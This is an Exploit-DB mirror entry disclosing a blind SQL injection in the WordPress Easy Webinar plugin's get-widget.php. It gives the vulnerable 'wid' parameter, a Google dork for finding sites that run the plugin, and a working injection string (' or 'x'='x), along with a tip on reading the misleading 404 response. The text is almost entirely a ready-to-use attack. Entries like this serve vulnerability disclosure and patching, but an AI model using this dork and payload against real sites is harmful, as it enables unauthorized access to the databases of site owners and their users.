exploit-db-mirror/exploits/php/webapps/22300.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

30 lines
No EOL
835 B
Text

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability
# Vendor Homepage: www.easywebinarplugin.com
# Date: 10/26/2012
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: wid=
# Google Dork: allinurl: get-widget.php?wid=
##############################################################
Exploit:
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]
Note: The HTTP response will read 404, but this is false:
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x
This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################
www.areyousecure.net
# Shouts to the Belegit crew